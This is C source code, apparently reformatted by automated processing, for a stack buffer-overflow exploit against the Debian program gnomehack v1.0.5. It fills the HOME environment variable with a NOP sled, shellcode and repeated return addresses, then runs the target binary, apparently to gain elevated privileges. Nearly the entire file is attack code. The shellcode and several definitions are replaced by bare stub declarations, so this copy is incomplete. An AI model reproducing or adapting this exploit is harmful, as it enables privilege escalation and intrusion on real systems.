
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int DEFAULT_ALIGN ;
 int DEFAULT_OFFSET ;
 char* PATH ;
 int atoi (char*) ;
 int esp () ;
 int exec ;
 scalar_t__ execlp (char*,char*,int ) ;
 int exit (int) ;
 int memcpy (char*,int ,int) ;
 int printf (char*,...) ;
 int setenv (char*,char*,int) ;
 int strlen (int ) ;

int main(int argc,char **argv){
 char bof[300];
 int i,offset,align;
 long ret;
 printf("[ (linux/debian)gnomehack[v1.0.5] buffer overflow, by: v9[v9@fakehalo."
 "org]. ]\n");
 if(argc>1){offset=atoi(argv[1]);}
 else{offset=DEFAULT_OFFSET;}
 if(argc>2){
  if(atoi(argv[2])>3||atoi(argv[2])<0){
   printf("*** ignored argument alignment value: %s. (use 0-3)\n",argv[2]);
   align=DEFAULT_ALIGN;
  }
  else{align=atoi(argv[2]);}
 }
 else{align=DEFAULT_ALIGN;}
 ret=(esp()-offset);
 printf("[ return address: 0x%lx, offset: %d, align: %d. ]\n",ret,offset,align);
 for(i=align;i<300;i+=4){*(long *)&bof[i]=ret;}
 for(i=0;i<(250-strlen(exec));i++){*(bof+i)=0x90;}
 memcpy(bof+i,exec,strlen(exec));
 setenv("HOME",bof,1);
 if(execlp(PATH,"gnomehack",0)){
  printf("*** execution of %s failed. (check the path)\n",PATH);
  exit(-1);
 }
}
